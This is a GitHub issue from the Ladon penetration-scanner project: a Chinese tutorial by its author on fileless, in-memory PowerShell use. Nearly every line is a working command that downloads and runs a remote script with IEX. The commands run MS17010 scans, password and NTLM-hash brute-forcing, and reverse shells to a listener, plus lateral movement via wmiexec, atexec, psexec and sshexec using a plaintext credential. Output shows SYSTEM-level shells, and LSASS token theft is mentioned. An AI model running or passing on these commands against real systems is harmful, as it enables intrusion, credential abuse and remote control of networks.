k8gege / Ladon

Ladon大型内网渗透扫描器,PowerShell、Cobalt Strike插件、内存加载、无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。网络资产探测32种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)或方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等,大量高危漏洞检测模块MS17010、Zimbra、Exchange
http://k8gege.org/Ladon/
MIT License
4.89k stars 862 forks source link

〖教程〗PowerShell远程内存加载(无文件渗透) #34

Open k8gege opened 4 years ago

k8gege commented 4 years ago

〖教程〗PowerShell远程内存加载(无文件渗透) http://k8gege.org/Ladon/RemoteLadon.html

前言

本文仅是PowerLadon远程加载例子,并不代表只有这些功能。详情参考完整文档 脚本可直接远程内存加载使用无须免杀,或者有些人比较喜欢的所谓无文件渗透

完整文档:http://k8gege.org/Ladon

架设WEB服务器

使用命令 Ladon web 800 架设一个WEB服务器,用于远程下载脚本 实战可架设在VPS,或者架设在目标内网机器(因为有机器不能出网) 将脚本放在WEB目录下即可,当然大家也可以用IIS或APACHE搭建WEB

image

远程加载MS17010漏洞扫描

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.8/24 MS17010" image

远程加载Oracle弱口令爆破

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.141 OracleScan"

远程加载SmbScan 445端口弱口令爆破

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.141 SmbScan" image

远程加载WmiScan 135端口弱口令爆破

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.141 WmiScan" image

远程加载SmbHash爆破内网主机(NtlmHash)

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.40 SmbHash" image

远程加载WmiHash爆破内网主机(NtlmHash)

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.40 WmiHash" image

远程加载反弹NC SHELL

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon ReverseTcp 192.168.1.3 4444 nc"

远程加载PowerCat反弹NC SHELL

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.110:800/Ladon6.6_all.ps1'); Ladon PowerCat 192.168.1.110 4444 cmd" image

远程加载WMI内网横向

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon wmiexec 192.168.1.40 administrator k8gege520 whoami" image

远程加载atexec内网横向

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon atexec 192.168.1.40 administrator k8gege520 whoami" image

远程加载sshexec内网横向

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon sshexec 192.168.1.40 root k8gege520 whoami" image

远程加载SMBHASH爆破内网主机(NtlmHash)

C:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.40 smbhash"
Ladon 6.6
Start: 2020-07-03 17:12:31
Runtime: .net 2.0  OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
192.168.1.40
load SmbHashScan
ICMP: 192.168.1.40      00-0C-29-0E-1D-50       VMware
192.168.1.40 445 Open
SmbHashCheck 192.168.1.40 administrator BCB4DEE13F1BE64A85DE5769056E3008
Successfully authenticated to the target
Found 192.168.1.40 administrator BCB4DEE13F1BE64A85DE5769056E3008 ISOK
IP Finished!
End: 2020-07-03 17:12:35

远程加载psexec内网横向

C:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon psexec 192.168.1.40"
Ladon 6.6
Start: 2020-07-03 15:35:55
Runtime: .net 2.0  OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
Load PsExec
[*] hostname: 192.168.1.40
[*] Choosing net35
[*] Copied net35 service executable to 192.168.1.40
[*] Installed net35 Service on 192.168.1.40
[*] Service Started on 192.168.1.40
psexec> whoami
nt authority\system

远程加载atexec内网横向

C:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon atexec 192.168.1.40 adm
inistrator k8gege520 whoami"
Ladon 6.6
Start: 2020-07-03 17:07:53
Runtime: .net 2.0  OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
Load AtExec
SmbExec by 0x7556
IPC Connected
=====================================================
nt authority\system

远程加载wmiexec内网横向

C:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon wmiexec 192.168.1.40 ad
ministrator k8gege520 whoami"
Ladon 6.6
Start: 2020-07-03 17:17:28
Runtime: .net 2.0  OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
Load WmiExec
[!] Connecting with administrator
[i] Connecting to 192.168.1.40
[i] Connected
[i] Command: whoami
[i] Running command...
[i] Getting stdout from registry from SOFTWARE\
[i] Full command output received
win-4udh62v7dmn\administrator

获取本机IP与外网IP

image

使用指定用户执行命令

image

窃取指定进程令牌权限执行命令,如LSASS获取SYSTEM权限

image

工具下载

最新版本:https://k8gege.org/Download 历史版本: https://github.com/k8gege/Ladon/releases